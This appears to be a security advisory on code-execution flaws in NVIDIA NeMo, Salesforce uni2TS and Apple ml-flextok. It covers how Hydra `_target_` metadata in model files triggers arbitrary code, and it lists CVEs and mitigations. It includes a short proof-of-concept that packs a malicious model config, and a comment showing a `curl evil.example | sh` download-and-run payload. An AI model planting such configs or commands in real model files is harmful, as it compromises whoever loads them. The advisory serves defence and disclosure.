Executive Summary
In January 2026, significant remote code execution (RCE) vulnerabilities were publicly detailed across leading open-source AI/ML Python libraries maintained by NVIDIA (NeMo), Salesforce (uni2TS), and Apple (ml-flextok). Attackers could craft model files with malicious metadata; when a vulnerable library loaded such a file, arbitrary code executed on the host system. These vulnerabilities stemmed from insecure use of third-party serialization and configuration functions, primarily Hydra's instantiate(), without proper validation, enabling supply chain attacks on widely distributed AI models, particularly via public repositories such as Hugging Face. No in-the-wild exploitation was confirmed before public disclosure, and the affected vendors coordinated prompt patches and mitigations throughout 2025.
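The root-cause pattern can be illustrated with a minimal sketch of how Hydra-style `_target_` strings resolve to callables. This is a simplified stand-in for Hydra's instantiate() using only the standard library; the metadata values shown are hypothetical:

```python
import importlib

def resolve_target(path: str):
    """Simplified model of how a `_target_` string becomes a callable:
    import the module, then look up the attribute. Hydra's instantiate()
    performs this resolution (plus argument binding) on config values."""
    module_name, _, attr = path.rpartition(".")
    return getattr(importlib.import_module(module_name), attr)

# A legitimate config resolves to a harmless function or constructor...
assert resolve_target("math.sqrt")(9.0) == 3.0

# ...but the same mechanism resolves attacker-chosen metadata such as
#   {"_target_": "os.system", "_args_": ["curl evil.example | sh"]}
# to os.system, which a loader that skips validation would then call.
import os
assert resolve_target("os.system") is os.system
```

Because resolution accepts any importable dotted path, the absence of validation turns a "configuration" field into an arbitrary-code primitive.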
This incident illustrates a growing trend of software supply chain threats cascading into the AI/ML ecosystem. As AI adoption grows and pretrained models are routinely shared, even seemingly safe file formats can introduce hidden risks, underscoring the urgency of security controls, vigilance in model sourcing, and rapid adoption of secure-by-design principles for both model creators and consumers.
Why This Matters Now
With the explosive growth of AI/ML deployment and model sharing, insecure dependencies and model formats threaten the integrity of AI supply chains. As organizations accelerate AI adoption, adversaries increasingly target overlooked entry points—such as model configuration loaders—presenting urgent risks for data exposure, lateral movement, and hidden persistence.
Attack Path Analysis
The attack began with an adversary uploading a malicious AI/ML model file containing crafted metadata to a public repository or AI model hub, targeting supply chain vulnerabilities in popular Python libraries. When a victim organization loaded the compromised model, remote code execution was achieved because the library failed to sanitize the metadata. The attacker then used this foothold to move laterally across workloads, leveraging east-west connections and unsegmented traffic flows. After establishing persistence, the adversary set up command and control over outbound connections for further payload delivery and remote management, then exfiltrated sensitive data or proprietary model information over available egress paths. Finally, the attacker could disrupt AI service integrity, deploy ransomware, or corrupt models, impacting organizational operations.
Kill Chain Progression
Initial Compromise
Description
Attacker uploads a malicious AI/ML model to a public repository or shares it with the victim, embedding code in metadata to exploit the supply chain via vulnerable deserialization.
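The attacker's side of this step can be sketched as follows. The sketch assumes the model archive is a tar file carrying a Hydra-style model_config.yaml (the layout used by .nemo checkpoints); the payload shown is hypothetical:

```python
import io
import tarfile

# Attacker-controlled metadata: a Hydra-style config whose _target_
# points at an arbitrary callable instead of a model class.
malicious_yaml = b'_target_: os.system\n_args_: ["id > /tmp/pwned"]\n'

# Pack it into an archive shaped like a model checkpoint (assumption:
# a tar archive containing a model_config.yaml).
buf = io.BytesIO()
with tarfile.open(fileobj=buf, mode="w") as tar:
    info = tarfile.TarInfo("model_config.yaml")
    info.size = len(malicious_yaml)
    tar.addfile(info, io.BytesIO(malicious_yaml))

# The resulting bytes are what gets uploaded to a public model hub;
# a vulnerable loader would later feed the YAML to instantiate().
buf.seek(0)
with tarfile.open(fileobj=buf, mode="r") as tar:
    names = tar.getnames()
print(names)  # ['model_config.yaml']
```

Nothing in the archive itself is executable; the danger lies entirely in how the consuming library interprets the metadata.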
Related CVEs
CVE-2025-23304
CVSS: 9.8
A code injection vulnerability in the NVIDIA NeMo library's model loading component allows attackers to execute arbitrary code by loading .nemo files with malicious metadata.
Affected Products:
NVIDIA NeMo – < 2.3.2
Exploit Status: no public exploit

CVE-2026-22584
CVSS: 9.8
A code injection vulnerability in Salesforce uni2TS allows attackers to execute arbitrary code by leveraging executable code in non-executable files.
Affected Products:
Salesforce uni2TS – <= 1.2.0
Exploit Status: no public exploit
MITRE ATT&CK® Techniques
Techniques reflect AI/ML supply chain and model parsing RCE attack paths. Additional enrichment and sub-techniques may be incorporated as threat intelligence matures.
Supply Chain Compromise: Compromise Software Dependencies and Development Tools (T1195.001)
User Execution: Malicious File (T1204.002)
Command and Scripting Interpreter: Python (T1059.006)
Event Triggered Execution: Windows Management Instrumentation Event Subscription (T1546.003)
Hijack Execution Flow: DLL Side-Loading (T1574.002)
Obfuscated Files or Information (T1027)
Indicator Removal: File Deletion (T1070.004)
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Change and Vulnerability Management Procedures
Control ID: 6.4.3
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA (Digital Operational Resilience Act) – ICT Risk Management Framework
Control ID: Article 16
CISA Zero Trust Maturity Model 2.0 – Supply Chain (Assets Component)
Control ID: 5.2.3
NIS2 Directive – Supply Chain Security
Control ID: Article 21(2)(d)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Information Technology/IT
Critical supply chain vulnerability in AI/ML libraries affects development pipelines, requiring immediate patching of NeMo, Uni2TS, and FlexTok dependencies to prevent remote code execution.
Computer Software/Engineering
Software development teams using PyTorch-based AI frameworks face high-severity RCE risks from malicious model metadata, necessitating secure model loading practices and library updates.
Financial Services
AI-driven forecasting and analysis systems using Salesforce Moirai time series models are vulnerable to code execution attacks, compromising sensitive financial data and trading algorithms.
Health Care / Life Sciences
Healthcare AI applications processing medical imaging and predictive analytics exposed to supply chain attacks through compromised model files, threatening patient data confidentiality.
Sources
- Remote Code Execution With Modern AI/ML Formats and Libraries – https://unit42.paloaltonetworks.com/rce-vulnerabilities-in-ai-python-libraries/ (Verified)
- Security Bulletin: NVIDIA NeMo Framework - August 2025 – https://nvidia.custhelp.com/app/answers/detail/a_id/5686 (Verified)
- Salesforce Help – https://help.salesforce.com/s/articleView?id=005239354&type=1 (Verified)
- CVE-2025-23304 - NVD – https://nvd.nist.gov/vuln/detail/CVE-2025-23304 (Verified)
- CVE-2026-22584 - NVD – https://nvd.nist.gov/vuln/detail/CVE-2026-22584 (Verified)
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust segmentation, east-west traffic controls, runtime anomaly detection, and egress enforcement would have constrained the attack by limiting initial supply chain exposure, detecting unauthorized remote code execution, restricting lateral movement, and preventing data exfiltration from compromised AI workloads.
Control: Multicloud Visibility & Control
Mitigation: Improved detection of supply chain anomalies and out-of-policy model assets.
Control: Threat Detection & Anomaly Response
Mitigation: Rapid detection of anomalous process or network behaviors stemming from unauthorized code execution.
Control: East-West Traffic Security
Mitigation: Prevents lateral movement by enforcing segmentation between workloads, namespaces, and services.
Control: Egress Security & Policy Enforcement
Mitigation: Blocks unauthorized outbound connections used for command, payload staging, or remote control.
Control: Encrypted Traffic (HPE)
Mitigation: Enables inspection and control of encrypted traffic to identify and block malicious exfiltration.
Together, these controls limit the scope of impact to the compromised segments or workloads.
Impact at a Glance
Affected Business Functions
- AI/ML Model Deployment
- Data Processing Pipelines
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive AI/ML model data and intellectual property due to unauthorized code execution.
Recommended Actions
Key Takeaways & Next Steps
- Apply Zero Trust segmentation to all AI/ML workloads, restricting communications to essential flows only.
- Enforce strict egress policies and monitor outbound traffic from AI infrastructure for unauthorized connections or data exfiltration attempts.
- Deploy runtime anomaly detection controls on AI/ML workloads to rapidly identify and respond to abnormal code execution or behavioral deviations.
- Centralize cloud and workload visibility to monitor for unapproved model assets and detect supply chain abuses across cloud providers.
- Regularly update and validate all open-source libraries and models, ensuring only trusted, vetted components are deployed in production environments.
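The last point can be sketched as a defensive check on the consumer side: reject any `_target_` value not on an explicit allowlist before anything is dynamically instantiated. The allowed class paths below are hypothetical examples; a real loader would list exactly the classes it expects:

```python
# Hypothetical allowlist: the class paths a given loader actually expects.
ALLOWED_TARGETS = {
    "torch.nn.Linear",
    "nemo.collections.asr.models.EncDecCTCModel",
}

def validate_config(cfg) -> None:
    """Recursively reject any _target_ value not on the allowlist,
    walking nested dicts and lists before any dynamic instantiation."""
    if isinstance(cfg, dict):
        target = cfg.get("_target_")
        if target is not None and target not in ALLOWED_TARGETS:
            raise ValueError(f"untrusted _target_: {target!r}")
        for value in cfg.values():
            validate_config(value)
    elif isinstance(cfg, list):
        for item in cfg:
            validate_config(item)

validate_config({"model": {"_target_": "torch.nn.Linear"}})  # passes silently
try:
    validate_config({"model": {"_target_": "os.system"}})
except ValueError as err:
    print(err)  # untrusted _target_: 'os.system'
```

An allowlist is preferable to a denylist here because the set of dangerous importable callables is effectively unbounded, while the set of legitimate model classes for a given loader is small and known.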

